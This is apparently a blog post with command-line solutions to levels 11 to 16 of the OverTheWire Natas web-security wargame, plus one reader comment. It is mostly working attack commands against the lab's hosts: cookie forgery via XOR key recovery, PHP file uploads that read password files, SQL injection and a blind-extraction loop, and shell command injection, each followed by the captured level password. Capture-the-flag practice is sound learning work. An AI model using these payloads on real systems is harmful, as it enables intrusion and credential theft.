# Natas wargame: Level 11 to 16


Level 11

# wget --quiet -O - --user=natas11 --password=SUIRtXqbB3tWzTOgTAX2t8UfMbYKrgp6 --post-data "submit=&bgcolor=#ffffff" --keep-session-cookies --save-cookies natas11.cookie http://natas11.natas.labs.overthewire.org
# cat xor_encrypt
#!/usr/bin/php
<?php
$key=json_encode(array("showpassword"=>"no","bgcolor"=>"#ffffff"));
$text=base64_decode($argv[1]);
$outText="";
for($i=0;$i<strlen($text);$i++){
        $outText.=$text[$i]^$key[$i%strlen($key)];
}
echo $outText;
?>
# grep natas natas11.cookie
natas11.natas.labs.overthewire.org      FALSE   /       FALSE   0       data    ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D
# ./xor_encrypt ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw
qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq
# cat set_cookie
#!/usr/bin/php
<?php
$key=$argv[1];
$text=json_encode(array("showpassword"=>"yes","bgcolor"=>"#ffffff"));
$outText="";
for($i=0;$i<strlen($text);$i++){
        $outText.=$text[$i]^$key[$i%strlen($key)];
}
echo base64_encode($outText);
?>
# ./set_cookie qw8J
ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
# string=`./set_cookie qw8J`
# sed -i "s/data\t.*%3D/data\t$string/" natas11.cookie
# wget --quiet -O - --user=natas11 --password=SUIRtXqbB3tWzTOgTAX2t8UfMbYKrgp6 --post-data 'submit=&bgcolor=#ffffff' --load-cookies natas11.cookie --keep-session-cookies --save-cookies natas11.cookie http://natas11.natas.labs.overthewire.org | grep natas12 | awk '{print $6}' | cut -b -32
sh7DrWKtb8xw9PIMkh8OQsgno6iZnJQu
Level 12

# curl --silent --user natas12:sh7DrWKtb8xw9PIMkh8OQsgno6iZnJQu --request POST --header "Content-Type: multipart/form-data; boundary=#" --data $'--#\r\nContent-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n1000\r\n--#\r\nContent-Disposition: form-data; name="filename"\r\n\r\nfuckyou.php\r\n--#\r\nContent-Disposition: form-data; name="uploadedfile"; filename="fuckyou.php"\r\nContent-Type: application/x-php\r\n\r\n<?php readfile("/etc/natas_webpass/natas13");?>\r\n--#--\r\n\r\n' http://natas12.natas.labs.overthewire.org | grep upload | awk -F\" '{print $2}'
upload/oijrt0cyhv.php
# curl --silent --user natas12:sh7DrWKtb8xw9PIMkh8OQsgno6iZnJQu http://natas12.natas.labs.overthewire.org/upload/oijrt0cyhv.php
IGCXqS4x472aoHZYaidvmeoWj2GmuRYz
Level 13

# curl --silent --user natas13:IGCXqS4x472aoHZYaidvmeoWj2GmuRYz --request POST --header "Content-Type: multipart/form-data; boundary=#" --data $'--#\r\nContent-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n1000\r\n--#\r\nContent-Disposition: form-data; name="filename"\r\n\r\nfuckyou.php\r\n--#\r\nContent-Disposition: form-data; name="uploadedfile"; filename="fuckyou.php"\r\nContent-Type: image/jpg\r\n\r\n'"`echo -n "ffd8ff" | xxd -p -r`"$'<?php readfile("/etc/natas_webpass/natas14");?>\r\n--#--\r\n\r\n' http://natas13.natas.labs.overthewire.org | grep upload | awk -F\" '{print $2}'
upload/pmg8woiyek.php
# curl --silent --user natas13:IGCXqS4x472aoHZYaidvmeoWj2GmuRYz http://natas13.natas.labs.overthewire.org/upload/pmg8woiyek.php | cut -b 4-
sSkCeug1bdrYejzAaBhgwI3qJXDKqlgh
Level 14

# curl --silent --user natas14:sSkCeug1bdrYejzAaBhgwI3qJXDKqlgh --request POST --data "username=\"or true#" http://natas14.natas.labs.overthewire.org | grep natas15 | awk '{print $8}' | cut -b -32
m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV
Level 15

# j=1; while [ true ]; do result=`curl --silent --user natas15:m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV --request POST --data "username=natas16\" and length(password)=$j#" http://natas15.natas.labs.overthewire.org | grep "This user exists"` ; if [ "$result" != "" ]; then echo $j; break; fi; j=$[$j+1]; done
32
# for i in `seq $j`; do for k in `seq 33 126`; do result=`curl --silent --user natas15:m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV --request POST --data "username=natas16\" and ascii(substr((select password),$i,1))=$k#" http://natas15.natas.labs.overthewire.org | grep "This user exists"` ; if [ "$result" != "" ]; then echo "obase=16;ibase=10;$k" | bc -l | xxd -p -r ; break; fi; done; done; echo
3VfCzgaWjEAcmCQphiEPoXi9HtlmVr3L
Level 16

# wget --quiet -O - --user=natas16 --password=3VfCzgaWjEAcmCQphiEPoXi9HtlmVr3L --post-data 'submit=&needle=$(cat /etc/natas_webpass/natas17 > /tmp/natas17)' http://natas16.natas.labs.overthewire.org > /dev/null
# wget --quiet -O - --user=natas9 --password=sQ6DKR8ICwqDMTd48lQlJfbF1q9B3edT --post-data 'submit=&needle=;cat /tmp/natas17;' http://natas9.natas.labs.overthewire.org | grep -v -e ^$ -e ^\< | tail -n 1
9HBzt5ljtPAgmaYvNfZ8chZVq50oepsx




1 comment:

handshake said...

Man, this is classic! I fell in love with the pure minimal beauty of the solution of Level 16. Charm! Respect!